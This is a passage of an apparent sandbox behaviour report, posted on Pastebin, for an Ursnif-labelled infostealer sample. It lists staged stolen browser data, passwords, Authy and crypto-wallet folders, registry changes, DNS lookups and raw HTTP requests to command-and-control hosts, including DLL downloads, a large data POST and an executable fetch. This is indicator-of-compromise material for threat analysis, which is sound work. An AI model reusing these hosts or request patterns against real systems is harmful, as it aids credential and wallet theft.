  671.     "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\WERBFDE.tmp.hdmp",
  672.     "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\WERC713.tmp.mdmp",
  673.     "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\Report.wer",
  674.     "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
  675.     "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\Report.wer.tmp"
  676.  
  677.  
  678. * Deleted Files:
  679.     "C:\\ProgramData\\freebl3.dll",
  680.     "C:\\ProgramData\\mozglue.dll",
  681.     "C:\\ProgramData\\msvcp140.dll",
  682.     "C:\\ProgramData\\nss3.dll",
  683.     "C:\\ProgramData\\softokn3.dll",
  684.     "C:\\ProgramData\\vcruntime140.dll",
  685.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Autofill\\Google Chrome_Default.txt",
  686.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Autofill",
  687.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\CC\\Google Chrome_Default.txt",
  688.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\CC",
  689.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Edge_Cookies.txt",
  690.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Google Chrome_Default.txt",
  691.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\IE_Cookies.txt",
  692.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies",
  693.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\cookie_list.txt",
  694.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Downloads\\Google Chrome_Default.txt",
  695.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Downloads",
  696.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Files\\Default.zip",
  697.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Files",
  698.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\History\\Google Chrome_Default.txt",
  699.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\History",
  700.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\information.txt",
  701.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\outlook.txt",
  702.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\passwords.txt",
  703.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\screenshot.jpg",
  704.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Soft\\Authy",
  705.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Soft",
  706.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Anoncoin",
  707.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\BBQCoin",
  708.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Bitcoin",
  709.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DashCore",
  710.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DevCoin",
  711.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DigitalCoin",
  712.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\ElectronCash",
  713.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Electrum",
  714.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\ElectrumLTC",
  715.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Ethereum",
  716.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Exodus",
  717.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FlorinCoin",
  718.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Franko",
  719.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FreiCoin",
  720.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\GoldCoinGLD",
  721.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\InfiniteCoin",
  722.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IOCoin",
  723.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IxCoin",
  724.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\JAXX",
  725.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Litecoin",
  726.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MegaCoin",
  727.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MinCoin",
  728.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MultiDoge",
  729.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\NameCoin",
  730.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\PrimeCoin",
  731.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\TerraCoin",
  732.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\YACoin",
  733.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Zcash",
  734.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets",
  735.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\CA_00000000-0000-0000-0000-0000000000009437374709.zip",
  736.     "C:\\Users\\user\\AppData\\Local\\Temp\\Ursnif_6cc70fb7b014fe253989338d5008381d.exe",
  737.     "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBC62.tmp",
  738.     "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBC62.tmp.appcompat.txt",
  739.     "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFBE.tmp",
  740.     "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFBE.tmp.WERInternalMetadata.xml",
  741.     "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFDE.tmp",
  742.     "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFDE.tmp.hdmp",
  743.     "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC713.tmp",
  744.     "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC713.tmp.mdmp",
  745.     "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\Report.wer.tmp"
  746.  
  747.  
  748. * Modified Registry Keys:
  749.     "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
  750.     "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
  751.     "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
  752.     "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining",
  753.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
  754.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent"
  755.  
  756.  
  757. * Deleted Registry Keys:
  758.  
  759. * DNS Communications:
  760.    
  761.         "type": "A",
  762.         "request": "otnet.xyz",
  763.         "answers":
  764.            
  765.                 "data": "209.141.47.33",
  766.                 "type": "A"
  767.            
  768.        
  769.    
  770.    
  771.         "type": "A",
  772.         "request": "ip-api.com",
  773.         "answers":
  774.            
  775.                 "data": "72.11.140.50",
  776.                 "type": "A"
  777.            
  778.            
  779.                 "data": "66.212.29.250",
  780.                 "type": "A"
  781.            
  782.        
  783.    
  784.    
  785.         "type": "A",
  786.         "request": "bookyeti.com",
  787.         "answers":
  788.            
  789.                 "data": "199.204.213.10",
  790.                 "type": "A"
  791.            
  792.        
  793.    
  794.  
  795.  
  796. * Domains:
  797.    
  798.         "ip": "209.141.47.33",
  799.         "domain": "otnet.xyz"
  800.    
  801.    
  802.         "ip": "72.11.140.50",
  803.         "domain": "ip-api.com"
  804.    
  805.    
  806.         "ip": "199.204.213.10",
  807.         "domain": "bookyeti.com"
  808.    
  809.  
  810.  
  811. * Network Communication - ICMP:
  812.  
  813. * Network Communication - HTTP:
  814.    
  815.         "count": 1,
  816.         "body": "--1BEF0A57BE110FD467A--\r\n",
  817.         "uri": "http://otnet.xyz/141",
  818.         "user-agent": "",
  819.         "method": "POST",
  820.         "host": "otnet.xyz",
  821.         "version": "1.1",
  822.         "path": "/141",
  823.         "data": "POST /141 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  824.         "port": 80
  825.    
  826.    
  827.         "count": 1,
  828.         "body": "",
  829.         "uri": "http://otnet.xyz/freebl3.dll",
  830.         "user-agent": "",
  831.         "method": "GET",
  832.         "host": "otnet.xyz",
  833.         "version": "1.1",
  834.         "path": "/freebl3.dll",
  835.         "data": "GET /freebl3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\n\r\n",
  836.         "port": 80
  837.    
  838.    
  839.         "count": 1,
  840.         "body": "",
  841.         "uri": "http://otnet.xyz/freebl3.dll?ddosprotected=1",
  842.         "user-agent": "",
  843.         "method": "GET",
  844.         "host": "otnet.xyz",
  845.         "version": "1.1",
  846.         "path": "/freebl3.dll?ddosprotected=1",
  847.         "data": "GET /freebl3.dll?ddosprotected=1 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  848.         "port": 80
  849.    
  850.    
  851.         "count": 1,
  852.         "body": "",
  853.         "uri": "http://otnet.xyz/mozglue.dll",
  854.         "user-agent": "",
  855.         "method": "GET",
  856.         "host": "otnet.xyz",
  857.         "version": "1.1",
  858.         "path": "/mozglue.dll",
  859.         "data": "GET /mozglue.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  860.         "port": 80
  861.    
  862.    
  863.         "count": 1,
  864.         "body": "",
  865.         "uri": "http://otnet.xyz/msvcp140.dll",
  866.         "user-agent": "",
  867.         "method": "GET",
  868.         "host": "otnet.xyz",
  869.         "version": "1.1",
  870.         "path": "/msvcp140.dll",
  871.         "data": "GET /msvcp140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  872.         "port": 80
  873.    
  874.    
  875.         "count": 1,
  876.         "body": "",
  877.         "uri": "http://otnet.xyz/nss3.dll",
  878.         "user-agent": "",
  879.         "method": "GET",
  880.         "host": "otnet.xyz",
  881.         "version": "1.1",
  882.         "path": "/nss3.dll",
  883.         "data": "GET /nss3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  884.         "port": 80
  885.    
  886.    
  887.         "count": 1,
  888.         "body": "",
  889.         "uri": "http://otnet.xyz/softokn3.dll",
  890.         "user-agent": "",
  891.         "method": "GET",
  892.         "host": "otnet.xyz",
  893.         "version": "1.1",
  894.         "path": "/softokn3.dll",
  895.         "data": "GET /softokn3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  896.         "port": 80
  897.    
  898.    
  899.         "count": 2,
  900.         "body": "",
  901.         "uri": "http://otnet.xyz/vcruntime140.dll",
  902.         "user-agent": "",
  903.         "method": "GET",
  904.         "host": "otnet.xyz",
  905.         "version": "1.1",
  906.         "path": "/vcruntime140.dll",
  907.         "data": "GET /vcruntime140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  908.         "port": 80
  909.    
  910.    
  911.         "count": 1,
  912.         "body": "--1BEF0A57BE110FD467A--\r\n",
  913.         "uri": "http://ip-api.com/line/",
  914.         "user-agent": "",
  915.         "method": "POST",
  916.         "host": "ip-api.com",
  917.         "version": "1.1",
  918.         "path": "/line/",
  919.         "data": "POST /line/ HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  920.         "port": 80
  921.    
  922.    
  923.         "count": 1,
  924.         "body": "",
  925.         "uri": "http://otnet.xyz/",
  926.         "user-agent": "",
  927.         "method": "POST",
  928.         "host": "otnet.xyz",
  929.         "version": "1.1",
  930.         "path": "/",
  931.         "data": "POST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 40781\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  932.         "port": 80
  933.    
  934.    
  935.         "count": 1,
  936.         "body": "",
  937.         "uri": "http://bookyeti.com/img/3001.exe",
  938.         "user-agent": "",
  939.         "method": "GET",
  940.         "host": "bookyeti.com",
  941.         "version": "1.1",
  942.         "path": "/img/3001.exe",
  943.         "data": "GET /img/3001.exe HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: bookyeti.com\r\nConnection: Keep-Alive\r\n\r\n",
  944.         "port": 80
  945.    
  946.  
  947.  
  948. * Network Communication - SMTP:
  949.  
  950. * Network Communication - Hosts:
  951.  
  952. * Network Communication - IRC:
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top